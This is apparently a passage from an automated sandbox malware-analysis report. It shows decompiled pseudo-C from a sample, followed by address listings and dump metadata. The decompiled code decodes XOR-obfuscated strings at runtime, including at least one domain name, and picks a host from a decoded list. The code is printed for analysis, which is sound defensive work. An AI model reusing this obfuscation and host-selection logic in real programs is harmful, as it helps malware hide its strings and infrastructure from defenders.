                                                                    				 *((char*)(_t649 + 0x10a)) = 0x54;
                                                                    				 *((char*)(_t649 + 0x10b)) = 0x42;
                                                                    				 *((char*)(_t649 + 0x10e)) = 0x4b;
                                                                    				 *((char*)(_t649 + 0x110)) = 0x56;
                                                                    				 *((char*)(_t649 + 0x111)) = 0x50;
                                                                    				 *((char*)(_t649 + 0x113)) = 0xd;
                                                                    				 *((char*)(_t649 + 0x114)) = 0x40;
                                                                    				 *((char*)(_t649 + 0x116)) = 0x4e;
                                                                    				 *((char*)(_t649 + 0x117)) = 0x23;
                                                                    				_t616 = 0;
                                                                    				do {
                                                                    					if(_t513 >= 0x6f) {
                                                                    						_t513 = _t513 + 0x15;
                                                                    					} else {
                                                                    						_t513 = _t513 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t616 + 0x100) =  *(_t649 + _t616 + 0x100) ^ 0x00000023;
                                                                    					_t616 = _t616 + 1;
                                                                    				} while (_t616 < 0x18);
                                                                    				_t515 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xe0)) = 0xa9;
                                                                    				 *((char*)(_t649 + 0xe1)) = 0xa6;
                                                                    				 *((char*)(_t649 + 0xe2)) = 0xbd;
                                                                    				 *((char*)(_t649 + 0xe3)) = 0xbc;
                                                                    				 *((char*)(_t649 + 0xe4)) = 0xbb;
                                                                    				 *((char*)(_t649 + 0xe5)) = 0xac;
                                                                    				 *((char*)(_t649 + 0xe6)) = 0xa3;
                                                                    				 *((char*)(_t649 + 0xe7)) = 0xae;
                                                                    				 *((char*)(_t649 + 0xe8)) = 0xbc;
                                                                    				 *((char*)(_t649 + 0xe9)) = 0xbc;
                                                                    				 *((char*)(_t649 + 0xea)) = 0xa2;
                                                                    				 *((char*)(_t649 + 0xeb)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0xec)) = 0xb9;
                                                                    				 *((char*)(_t649 + 0xed)) = 0xa6;
                                                                    				 *((char*)(_t649 + 0xee)) = 0xa1;
                                                                    				 *((char*)(_t649 + 0xef)) = 0xa8;
                                                                    				 *((char*)(_t649 + 0xf0)) = 0xe1;
                                                                    				 *((char*)(_t649 + 0xf1)) = 0xac;
                                                                    				 *((char*)(_t649 + 0xf2)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0xf3)) = 0xa2;
                                                                    				 *((char*)(_t649 + 0xf4)) = 0xcf;
                                                                    				_t621 = 0;
                                                                    				do {
                                                                    					if(_t515 >= 0x6f) {
                                                                    						_t515 = _t515 + 0x15;
                                                                    					} else {
                                                                    						_t515 = _t515 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t621 + 0xe0) =  *(_t649 + _t621 + 0xe0) ^ 0x000000cf;
                                                                    					_t621 = _t621 + 1;
                                                                    				} while (_t621 < 0x15);
                                                                    				 *((char*)(_t649 + 0x82)) = 0xab;
                                                                    				 *((char*)(_t649 + 0x86)) = 0xab;
                                                                    				 *((char*)(_t649 + 0x85)) = 0xeb;
                                                                    				 *((char*)(_t649 + 0x89)) = 0xeb;
                                                                    				_t518 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0x80)) = 0xac;
                                                                    				 *((char*)(_t649 + 0x81)) = 0xac;
                                                                    				 *((char*)(_t649 + 0x83)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0x84)) = 0xb1;
                                                                    				 *((char*)(_t649 + 0x87)) = 0xa0;
                                                                    				 *((char*)(_t649 + 0x88)) = 0xb1;
                                                                    				 *((char*)(_t649 + 0x8a)) = 0xa4;
                                                                    				 *((char*)(_t649 + 0x8b)) = 0xb0;
                                                                    				 *((char*)(_t649 + 0x8c)) = 0xc5;
                                                                    				_t627 = 0;
                                                                    				do {
                                                                    					if(_t518 >= 0x6f) {
                                                                    						_t518 = _t518 + 0x15;
                                                                    					} else {
                                                                    						_t518 = _t518 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t627 + 0x80) =  *(_t649 + _t627 + 0x80) ^ 0x000000c5;
                                                                    					_t627 = _t627 + 1;
                                                                    				} while (_t627 < 0xd);
                                                                    				 *((char*)(_t649 + 0xf)) = 0x9d;
                                                                    				 *((char*)(_t649 + 0x13)) = 0x9d;
                                                                    				_t521 =  *(_t649 + 8) + (_t418 -  *(_t649 + 8) | 0x00000013) * 0x58;
                                                                    				 *((char*)(_t649 + 0xc)) = 0x8a;
                                                                    				 *((char*)(_t649 + 0xd)) = 0x9b;
                                                                    				 *((char*)(_t649 + 0xe)) = 0x92;
                                                                    				 *((char*)(_t649 + 0x10)) = 0x9f;
                                                                    				 *((char*)(_t649 + 0x11)) = 0x90;
                                                                    				 *((char*)(_t649 + 0x12)) = 0xd0;
                                                                    				 *((char*)(_t649 + 0x14)) = 0x91;
                                                                    				 *((char*)(_t649 + 0x15)) = 0x93;
                                                                    				 *((char*)(_t649 + 0x16)) = 0xfe;
                                                                    				_t422 = 0;
                                                                    				do {
                                                                    					if(_t521 >= 0x6f) {
                                                                    						_t521 = _t521 + 0x15;
                                                                    					} else {
                                                                    						_t521 = _t521 * 0x25;
                                                                    					}
                                                                    					 *(_t649 + _t422 + 0xc) =  *(_t649 + _t422 + 0xc) ^ 0x000000fe;
                                                                    					_t422 = _t422 + 1;
                                                                    				} while (_t422 < 0xb);
                                                                    				 *((intOrPtr*)(_t649 + 0x130)) = _t649 + 0x30;
                                                                    				 *((intOrPtr*)(_t649 + 0x134)) = _t649 + 0x60;
                                                                    				 *((intOrPtr*)(_t649 + 0x138)) = _t649 + 0x70;
                                                                    				 *((intOrPtr*)(_t649 + 0x13c)) = _t649 + 0x48;
                                                                    				 *((intOrPtr*)(_t649 + 0x140)) = _t649 + 0x90;
                                                                    				 *((intOrPtr*)(_t649 + 0x144)) = _t649 + 0xa0;
                                                                    				 *((intOrPtr*)(_t649 + 0x148)) = _t649 + 0xf8;
                                                                    				 *((intOrPtr*)(_t649 + 0x14c)) = _t649 + 0x24;
                                                                    				_t374 = _t649 + 0x118; // 0x6e
                                                                    				 *((intOrPtr*)(_t649 + 0x150)) = _t649 + 0x3c;
                                                                    				 *((intOrPtr*)(_t649 + 0x154)) = _t374;
                                                                    				 *((intOrPtr*)(_t649 + 0x158)) = _t649 + 0xc0;
                                                                    				 *((intOrPtr*)(_t649 + 0x15c)) = _t649 + 0x54;
                                                                    				 *((intOrPtr*)(_t649 + 0x160)) = _t649 + 0x124;
                                                                    				 *((intOrPtr*)(_t649 + 0x164)) = _t649 + 0x18;
                                                                    				 *((intOrPtr*)(_t649 + 0x16c)) = _t649 + 0xb4;
                                                                    				 *((intOrPtr*)(_t649 + 0x170)) = _t649 + 0xd4;
                                                                    				 *((intOrPtr*)(_t649 + 0x174)) = _t649 + 0x104;
                                                                    				_push(_t638);
                                                                    				_t639 = 0;
                                                                    				_t442 = 0;
                                                                    				 *((intOrPtr*)(_t649 + 0x17c)) = _t649 + 0xe8;
                                                                    				 *((intOrPtr*)(_t649 + 0x180)) = _t649 + 0x88;
                                                                    				 *((intOrPtr*)(_t649 + 0x184)) = _t649 + 0x14;
                                                                    				_t647 =  *((intOrPtr*)(_t649 + 0x1e0)) + 4;
                                                                    				do {
                                                                    					_t634 =  *((intOrPtr*)(_t649 + 0x1e4));
                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t649 + 0x1e4)) + 0x18)) < 0x10) {
                                                                    						_t430 = _t647;
                                                                    					} else {
                                                                    						_t430 =  *_t647;
                                                                    					}
                                                                    					_t642 =  *((intOrPtr*)(_t649 + 0x138 + _t639 * 4));
                                                                    					_t431 = E0041A1E0(_t430, _t642);
                                                                    					_t649 = _t649 + 8;
                                                                    					if(_t431 != 0) {
                                                                    						 *((intOrPtr*)(_t649 + 0x18c + _t442 * 4)) = _t642;
                                                                    						_t442 = _t442 + 1;
                                                                    					}
                                                                    					_t639 = _t639 + 1;
                                                                    				} while (_t639 < 0x14);
                                                                    				if(_t442 != 0) {
                                                                    					_t432 = E0040D1C0(_t634);
                                                                    					_t637 =  *((intOrPtr*)(_t649 + 0x184 + _t432 % _t442 * 4));
                                                                    					_t434 =  *((intOrPtr*)(_t649 + 0x184 + _t432 % _t442 * 4));
                                                                    					_t643 = _t434 + 1;
                                                                    					do {
                                                                    						_t529 =  *_t434;
                                                                    						_t434 = _t434 + 1;
                                                                    					} while (_t529 != 0);
                                                                    				} else {
                                                                    					_t637 =  *((intOrPtr*)(_t649 + 0x180));
                                                                    					_t437 =  *((intOrPtr*)(_t649 + 0x180));
                                                                    					_t643 = _t437 + 1;
                                                                    					do {
                                                                    						_t531 =  *_t437;
                                                                    						_t437 = _t437 + 1;
                                                                    					} while (_t531 != 0);
                                                                    				}
                                                                    				return E00402810( *((intOrPtr*)(_t649 + 0x1d8)), _t637, _t434 - _t643);
                                                                    			}






































































                                                                    0x0040f990
                                                                    0x0040f99b
                                                                    0x0040f99f
                                                                    0x0040f9a3
                                                                    0x0040f9b3
                                                                    0x0040f9b5
                                                                    0x0040f9ba
                                                                    0x0040f9bf
                                                                    0x0040f9c4
                                                                    0x0040f9c9
                                                                    0x0040f9ce
                                                                    0x0040f9d3
                                                                    0x0040f9d8
                                                                    0x0040f9dd
                                                                    0x0040f9e2
                                                                    0x0040f9e7
                                                                    0x0040f9f0
                                                                    0x0040f9f3
                                                                    0x0040f9fa
                                                                    0x0040f9f5
                                                                    0x0040f9f5
                                                                    0x0040f9f5
                                                                    0x0040f9fd
                                                                    0x0040fa02
                                                                    0x0040fa03
                                                                    0x0040fa0e
                                                                    0x0040fa12
                                                                    0x0040fa20
                                                                    0x0040fa22
                                                                    0x0040fa27
                                                                    0x0040fa2c
                                                                    0x0040fa31
                                                                    0x0040fa36
                                                                    0x0040fa3b
                                                                    0x0040fa40
                                                                    0x0040fa45
                                                                    0x0040fa4a
                                                                    0x0040fa4f
                                                                    0x0040fa54
                                                                    0x0040fa59
                                                                    0x0040fa60
                                                                    0x0040fa63
                                                                    0x0040fa6a
                                                                    0x0040fa65
                                                                    0x0040fa65
                                                                    0x0040fa65
                                                                    0x0040fa6d
                                                                    0x0040fa72
                                                                    0x0040fa73
                                                                    0x0040fa86
                                                                    0x0040fa88
                                                                    0x0040fa8d
                                                                    0x0040fa92
                                                                    0x0040fa97
                                                                    0x0040fa9c
                                                                    0x0040faa1
                                                                    0x0040faa6
                                                                    0x0040faab
                                                                    0x0040fab0
                                                                    0x0040fab5
                                                                    0x0040faba
                                                                    0x0040fabf
                                                                    0x0040fac4
                                                                    0x0040fac9
                                                                    0x0040fad0
                                                                    0x0040fad3
                                                                    0x0040fada
                                                                    0x0040fad5
                                                                    0x0040fad5
                                                                    0x0040fad5
                                                                    0x0040fadd
                                                                    0x0040fae2
                                                                    0x0040fae3
                                                                    0x0040faec
                                                                    0x0040faf0
                                                                    0x0040faf4
                                                                    0x0040faf8
                                                                    0x0040fafc
                                                                    0x0040fb0e
                                                                    0x0040fb10
                                                                    0x0040fb15
                                                                    0x0040fb1a
                                                                    0x0040fb1f
                                                                    0x0040fb24
                                                                    0x0040fb29
                                                                    0x0040fb2e
                                                                    0x0040fb33
                                                                    0x0040fb35
                                                                    0x0040fb38
                                                                    0x0040fb3f
                                                                    0x0040fb3a
                                                                    0x0040fb3a
                                                                    0x0040fb3a
                                                                    0x0040fb42
                                                                    0x0040fb47
                                                                    0x0040fb48
                                                                    0x0040fb51
                                                                    0x0040fb58
                                                                    0x0040fb5f
                                                                    0x0040fb66
                                                                    0x0040fb7d
                                                                    0x0040fb7f
                                                                    0x0040fb86
                                                                    0x0040fb8e
                                                                    0x0040fb96
                                                                    0x0040fb9e
                                                                    0x0040fba6
                                                                    0x0040fbad
                                                                    0x0040fbb5
                                                                    0x0040fbbd
                                                                    0x0040fbc5
                                                                    0x0040fbc7
                                                                    0x0040fbca
                                                                    0x0040fbd1
                                                                    0x0040fbcc
                                                                    0x0040fbcc
                                                                    0x0040fbcc
                                                                    0x0040fbd4
                                                                    0x0040fbdc
                                                                    0x0040fbdd
                                                                    0x0040fbe6
                                                                    0x0040fbed
                                                                    0x0040fbf4
                                                                    0x0040fbfb
                                                                    0x0040fc02
                                                                    0x0040fc17
                                                                    0x0040fc19
                                                                    0x0040fc21
                                                                    0x0040fc29
                                                                    0x0040fc31
                                                                    0x0040fc39
                                                                    0x0040fc41
                                                                    0x0040fc49
                                                                    0x0040fc51
                                                                    0x0040fc59
                                                                    0x0040fc61
                                                                    0x0040fc69
                                                                    0x0040fc70
                                                                    0x0040fc73
                                                                    0x0040fc7a
                                                                    0x0040fc75
                                                                    0x0040fc75
                                                                    0x0040fc75
                                                                    0x0040fc7d
                                                                    0x0040fc85
                                                                    0x0040fc86
                                                                    0x0040fc99
                                                                    0x0040fc9e
                                                                    0x0040fca5
                                                                    0x0040fca0
                                                                    0x0040fca0
                                                                    0x0040fca0
                                                                    0x0040fcab
                                                                    0x0040fcb3
                                                                    0x0040fcba
                                                                    0x0040fcb5
                                                                    0x0040fcb5
                                                                    0x0040fcb5
                                                                    0x0040fcc0
                                                                    0x0040fcc8
                                                                    0x0040fccf
                                                                    0x0040fcca
                                                                    0x0040fcca
                                                                    0x0040fcca
                                                                    0x0040fcd5
                                                                    0x0040fcdd
                                                                    0x0040fce4
                                                                    0x0040fcdf
                                                                    0x0040fcdf
                                                                    0x0040fcdf
                                                                    0x0040fcea
                                                                    0x0040fcf2
                                                                    0x0040fcf7
                                                                    0x0040fcf7
                                                                    0x0040fd02
                                                                    0x0040fd06
                                                                    0x0040fd18
                                                                    0x0040fd1a
                                                                    0x0040fd22
                                                                    0x0040fd2a
                                                                    0x0040fd32
                                                                    0x0040fd3a
                                                                    0x0040fd3f
                                                                    0x0040fd44
                                                                    0x0040fd49
                                                                    0x0040fd4e
                                                                    0x0040fd53
                                                                    0x0040fd58
                                                                    0x0040fd5d
                                                                    0x0040fd62
                                                                    0x0040fd67
                                                                    0x0040fd70
                                                                    0x0040fd73
                                                                    0x0040fd7a
                                                                    0x0040fd75
                                                                    0x0040fd75
                                                                    0x0040fd75
                                                                    0x0040fd7d
                                                                    0x0040fd82
                                                                    0x0040fd83
                                                                    0x0040fd98
                                                                    0x0040fd9a
                                                                    0x0040fd9f
                                                                    0x0040fda4
                                                                    0x0040fda9
                                                                    0x0040fdae
                                                                    0x0040fdb3
                                                                    0x0040fdb8
                                                                    0x0040fdbd
                                                                    0x0040fdc2
                                                                    0x0040fdc7
                                                                    0x0040fdcc
                                                                    0x0040fdd0
                                                                    0x0040fdd5
                                                                    0x0040fdd7
                                                                    0x0040fdda
                                                                    0x0040fde1
                                                                    0x0040fddc
                                                                    0x0040fddc
                                                                    0x0040fddc
                                                                    0x0040fde4
                                                                    0x0040fde9
                                                                    0x0040fdea
                                                                    0x0040fdfd
                                                                    0x0040fe02
                                                                    0x0040fe09
                                                                    0x0040fe04
                                                                    0x0040fe04
                                                                    0x0040fe04
                                                                    0x0040fe0f
                                                                    0x0040fe17
                                                                    0x0040fe1e
                                                                    0x0040fe19
                                                                    0x0040fe19
                                                                    0x0040fe19
                                                                    0x0040fe24
                                                                    0x0040fe2c
                                                                    0x0040fe33
                                                                    0x0040fe2e
                                                                    0x0040fe2e
                                                                    0x0040fe2e
                                                                    0x0040fe39
                                                                    0x0040fe41
                                                                    0x0040fe48
                                                                    0x0040fe43
                                                                    0x0040fe43
                                                                    0x0040fe43
                                                                    0x0040fe4e
                                                                    0x0040fe56
                                                                    0x0040fe5d
                                                                    0x0040fe58
                                                                    0x0040fe58
                                                                    0x0040fe58
                                                                    0x0040fe63
                                                                    0x0040fe6b
                                                                    0x0040fe70
                                                                    0x0040fe70
                                                                    0x0040fe7b
                                                                    0x0040fe82
                                                                    0x0040fe89
                                                                    0x0040fe9e
                                                                    0x0040fea0
                                                                    0x0040fea8
                                                                    0x0040feb0
                                                                    0x0040feb8
                                                                    0x0040fec0
                                                                    0x0040fec7
                                                                    0x0040fecf
                                                                    0x0040fed7
                                                                    0x0040fedf
                                                                    0x0040fee7
                                                                    0x0040feef
                                                                    0x0040fef7
                                                                    0x0040feff
                                                                    0x0040ff07
                                                                    0x0040ff0f
                                                                    0x0040ff17
                                                                    0x0040ff1f
                                                                    0x0040ff21
                                                                    0x0040ff24
                                                                    0x0040ff2b
                                                                    0x0040ff26
                                                                    0x0040ff26
                                                                    0x0040ff26
                                                                    0x0040ff2e
                                                                    0x0040ff36
                                                                    0x0040ff37
                                                                    0x0040ff3e
                                                                    0x0040ff42
                                                                    0x0040ff54
                                                                    0x0040ff56
                                                                    0x0040ff5b
                                                                    0x0040ff60
                                                                    0x0040ff65
                                                                    0x0040ff6a
                                                                    0x0040ff6f
                                                                    0x0040ff74
                                                                    0x0040ff79
                                                                    0x0040ff7e
                                                                    0x0040ff83
                                                                    0x0040ff88
                                                                    0x0040ff90
                                                                    0x0040ff93
                                                                    0x0040ff9a
                                                                    0x0040ff95
                                                                    0x0040ff95
                                                                    0x0040ff95
                                                                    0x0040ff9d
                                                                    0x0040ffa2
                                                                    0x0040ffa3
                                                                    0x0040ffb6
                                                                    0x0040ffbb
                                                                    0x0040ffc2
                                                                    0x0040ffbd
                                                                    0x0040ffbd
                                                                    0x0040ffbd
                                                                    0x0040ffc8
                                                                    0x0040ffd0
                                                                    0x0040ffd7
                                                                    0x0040ffd2
                                                                    0x0040ffd2
                                                                    0x0040ffd2
                                                                    0x0040ffdd
                                                                    0x0040ffe5
                                                                    0x0040ffec
                                                                    0x0040ffe7
                                                                    0x0040ffe7
                                                                    0x0040ffe7
                                                                    0x0040fff2
                                                                    0x0040fffa
                                                                    0x00410001
                                                                    0x0040fffc
                                                                    0x0040fffc
                                                                    0x0040fffc
                                                                    0x00410007
                                                                    0x0041000f
                                                                    0x00410016
                                                                    0x00410011
                                                                    0x00410011
                                                                    0x00410011
                                                                    0x0041001c
                                                                    0x00410024
                                                                    0x0041002b
                                                                    0x00410026
                                                                    0x00410026
                                                                    0x00410026
                                                                    0x00410031
                                                                    0x00410039
                                                                    0x0041003e
                                                                    0x0041003e
                                                                    0x00410049
                                                                    0x0041004d
                                                                    0x0041005f
                                                                    0x00410061
                                                                    0x00410069
                                                                    0x00410071
                                                                    0x00410079
                                                                    0x00410081
                                                                    0x00410086
                                                                    0x0041008b
                                                                    0x00410090
                                                                    0x00410095
                                                                    0x0041009a
                                                                    0x0041009f
                                                                    0x004100a4
                                                                    0x004100a9
                                                                    0x004100ae
                                                                    0x004100b0
                                                                    0x004100b3
                                                                    0x004100ba
                                                                    0x004100b5
                                                                    0x004100b5
                                                                    0x004100b5
                                                                    0x004100bd
                                                                    0x004100c2
                                                                    0x004100c3
                                                                    0x004100ca
                                                                    0x004100d3
                                                                    0x004100da
                                                                    0x004100e1
                                                                    0x004100f6
                                                                    0x004100f8
                                                                    0x00410100
                                                                    0x00410108
                                                                    0x00410110
                                                                    0x00410118
                                                                    0x00410120
                                                                    0x00410128
                                                                    0x00410130
                                                                    0x00410138
                                                                    0x00410140
                                                                    0x00410148
                                                                    0x00410150
                                                                    0x00410152
                                                                    0x00410155
                                                                    0x0041015c
                                                                    0x00410157
                                                                    0x00410157
                                                                    0x00410157
                                                                    0x0041015f
                                                                    0x00410167
                                                                    0x00410168
                                                                    0x0041016f
                                                                    0x00410176
                                                                    0x0041017f
                                                                    0x00410186
                                                                    0x0041019b
                                                                    0x0041019d
                                                                    0x004101a5
                                                                    0x004101ad
                                                                    0x004101b5
                                                                    0x004101bd
                                                                    0x004101c5
                                                                    0x004101cd
                                                                    0x004101d5
                                                                    0x004101dd
                                                                    0x004101e5
                                                                    0x004101ed
                                                                    0x004101f5
                                                                    0x004101fd
                                                                    0x00410200
                                                                    0x00410203
                                                                    0x0041020a
                                                                    0x00410205
                                                                    0x00410205
                                                                    0x00410205
                                                                    0x0041020d
                                                                    0x00410215
                                                                    0x00410216
                                                                    0x0041021d
                                                                    0x00410224
                                                                    0x0041022b
                                                                    0x00410236
                                                                    0x0041023d
                                                                    0x00410244
                                                                    0x0041024b
                                                                    0x00410252
                                                                    0x00410259
                                                                    0x00410260
                                                                    0x00410277
                                                                    0x00410279
                                                                    0x00410281
                                                                    0x00410289
                                                                    0x00410290
                                                                    0x00410298
                                                                    0x004102a0
                                                                    0x004102a8
                                                                    0x004102b0
                                                                    0x004102b8
                                                                    0x004102c0
                                                                    0x004102c7
                                                                    0x004102cf
                                                                    0x004102d7
                                                                    0x004102df
                                                                    0x004102e7
                                                                    0x004102f0
                                                                    0x004102f3
                                                                    0x004102fa
                                                                    0x004102f5
                                                                    0x004102f5
                                                                    0x004102f5
                                                                    0x004102fd
                                                                    0x00410305
                                                                    0x00410306
                                                                    0x00410319
                                                                    0x0041031b
                                                                    0x00410323
                                                                    0x0041032b
                                                                    0x00410333
                                                                    0x0041033b
                                                                    0x00410343
                                                                    0x0041034b
                                                                    0x00410353
                                                                    0x0041035b
                                                                    0x00410363
                                                                    0x0041036b
                                                                    0x00410373
                                                                    0x0041037b
                                                                    0x00410383
                                                                    0x0041038b
                                                                    0x00410393
                                                                    0x0041039b
                                                                    0x004103a3
                                                                    0x004103ab
                                                                    0x004103b3
                                                                    0x004103bb
                                                                    0x004103c3
                                                                    0x004103c5
                                                                    0x004103c8
                                                                    0x004103cf
                                                                    0x004103ca
                                                                    0x004103ca
                                                                    0x004103ca
                                                                    0x004103d2
                                                                    0x004103da
                                                                    0x004103db
                                                                    0x004103e2
                                                                    0x004103eb
                                                                    0x004103f2
                                                                    0x004103f9
                                                                    0x0041040e
                                                                    0x00410410
                                                                    0x00410418
                                                                    0x00410420
                                                                    0x00410428
                                                                    0x00410430
                                                                    0x00410438
                                                                    0x00410440
                                                                    0x00410448
                                                                    0x00410450
                                                                    0x00410458
                                                                    0x00410460
                                                                    0x00410463
                                                                    0x0041046a
                                                                    0x00410465
                                                                    0x00410465
                                                                    0x00410465
                                                                    0x0041046d
                                                                    0x00410475
                                                                    0x00410476
                                                                    0x0041047d
                                                                    0x00410481
                                                                    0x00410491
                                                                    0x00410493
                                                                    0x00410498
                                                                    0x0041049d
                                                                    0x004104a2
                                                                    0x004104a7
                                                                    0x004104ac
                                                                    0x004104b1
                                                                    0x004104b6
                                                                    0x004104bb
                                                                    0x004104c0
                                                                    0x004104c2
                                                                    0x004104c5
                                                                    0x004104cc
                                                                    0x004104c7
                                                                    0x004104c7
                                                                    0x004104c7
                                                                    0x004104cf
                                                                    0x004104d4
                                                                    0x004104d5
                                                                    0x004104de
                                                                    0x004104e9
                                                                    0x004104f4
                                                                    0x004104ff
                                                                    0x0041050d
                                                                    0x0041051b
                                                                    0x00410529
                                                                    0x00410534
                                                                    0x0041053f
                                                                    0x0041054d
                                                                    0x00410554
                                                                    0x0041055b
                                                                    0x00410571
                                                                    0x00410578
                                                                    0x0041057f
                                                                    0x004105a3
                                                                    0x004105aa
                                                                    0x004105b1
                                                                    0x004105b8
                                                                    0x004105cb
                                                                    0x004105cd
                                                                    0x004105cf
                                                                    0x004105d6
                                                                    0x004105dd
                                                                    0x004105e4
                                                                    0x004105f0
                                                                    0x004105f0
                                                                    0x004105fb
                                                                    0x00410602
                                                                    0x004105fd
                                                                    0x004105fd
                                                                    0x004105fd
                                                                    0x00410604
                                                                    0x0041060d
                                                                    0x00410612
                                                                    0x00410617
                                                                    0x00410619
                                                                    0x00410620
                                                                    0x00410620
                                                                    0x00410621
                                                                    0x00410622
                                                                    0x0041062b
                                                                    0x00410649
                                                                    0x00410652
                                                                    0x00410659
                                                                    0x0041065b
                                                                    0x00410660
                                                                    0x00410660
                                                                    0x00410662
                                                                    0x00410663
                                                                    0x0041062d
                                                                    0x0041062d
                                                                    0x00410634
                                                                    0x00410636
                                                                    0x00410640
                                                                    0x00410640
                                                                    0x00410642
                                                                    0x00410643
                                                                    0x00410647
                                                                    0x0041067f

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$#$-$.$.$.$2$:$;$?$?$?$@$@$B$K$N$S$T$V$W$W$W$W$a$c$c$c$e$e$e$f$g$g$h$i$j$k$m$m$m$n$n$n$n#N$o$o$o$p$p$p$r$t$t$t$t$t$t$v$y$y$y$|$~
                                                                    • API String ID: 0-1644108121
                                                                    • Opcode ID: 197809201f8e315d1db1d70486416f2259d0459b20b83fd2d4df95876e6d4ed9
                                                                    • Instruction ID: cf4cb0c633e6b1f2eed0d031947a95cb0e565cb991fcbc3eef89a8fac68b600f
                                                                    • Opcode Fuzzy Hash: 197809201f8e315d1db1d70486416f2259d0459b20b83fd2d4df95876e6d4ed9
                                                                    • Instruction Fuzzy Hash: C882602150C7C289C33AC63C895479FBED21BE7224F588B6EE0EA4B3E6D6744149C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040C070(void* __ecx, signed int _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v33;
                                                                    				char _v34;
                                                                    				char _v35;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v45;
                                                                    				char _v46;
                                                                    				char _v47;
                                                                    				char _v48;
                                                                    				char _v59;
                                                                    				char _v60;
                                                                    				char _v61;
                                                                    				char _v62;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				char _v65;
                                                                    				char _v66;
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				char _v69;
                                                                    				char _v70;
                                                                    				char _v71;
                                                                    				char _v72;
                                                                    				char _v73;
                                                                    				char _v74;
                                                                    				char _v75;
                                                                    				char _v76;
                                                                    				char _v77;
                                                                    				char _v78;
                                                                    				char _v79;
                                                                    				char _v80;
                                                                    				char _v81;
                                                                    				char _v82;
                                                                    				char _v83;
                                                                    				char _v84;
                                                                    				void* _v85;
                                                                    				char _v86;
                                                                    				char _v87;
                                                                    				char _v88;
                                                                    				void* _v89;
                                                                    				void* _v90;
                                                                    				void* _v91;
                                                                    				void* _v92;
                                                                    				void* _v104;
                                                                    				signed int _t112;
                                                                    				void* _t114;
                                                                    				signed int _t118;
                                                                    				intOrPtr _t128;
                                                                    				signed int _t134;
                                                                    				void* _t135;
                                                                    				signed int _t140;
                                                                    				void* _t141;
                                                                    				intOrPtr _t148;
                                                                    				void* _t169;
                                                                    				void* _t170;
                                                                    				void* _t171;
                                                                    
                                                                    				_t170 =  &_v88;
                                                                    				_t169 = __ecx;
                                                                    				_t134 =  *0x447b04; // 0x0
                                                                    				_v45 = 0x32;
                                                                    				_v44 = 0x23;
                                                                    				_v42 = 0x32;
                                                                    				_v37 = 0x23;
                                                                    				_v34 = 0x32;
                                                                    				_v33 = 0x23;
                                                                    				_v31 = 0x32;
                                                                    				_v17 = 0x23;
                                                                    				_v16 = 0x32;
                                                                    				_v35 = 0x66;
                                                                    				_v23 = 0x66;
                                                                    				_t112 = _a4 + (_a4 ^ _t134 ^ 0x00000054) * 0x6c;
                                                                    				_v88 = 0xd;
                                                                    				_v87 = 0xa;
                                                                    				_v86 = 0;
                                                                    				_v48 = 5;
                                                                    				_v47 = 0x29;
                                                                    				_v46 = 0x28;
                                                                    				_v43 = 0x28;
                                                                    				_v41 = 0x6b;
                                                                    				_v40 = 0x12;
                                                                    				_v39 = 0x3f;
                                                                    				_v38 = 0x36;
                                                                    				_v36 = 0x7c;
                                                                    				_v32 = 0x3e;
                                                                    				_v30 = 0x69;
                                                                    				_v29 = 0x36;
                                                                    				_v28 = 0x2a;
                                                                    				_v27 = 0x27;
                                                                    				_v26 = 0x2f;
                                                                    				_v25 = 0x28;
                                                                    				_v24 = 0x7d;
                                                                    				_v22 = 0x25;
                                                                    				_v21 = 0x2e;
                                                                    				_v20 = 0x27;
                                                                    				_v19 = 0x34;
                                                                    				_v18 = 0x35;
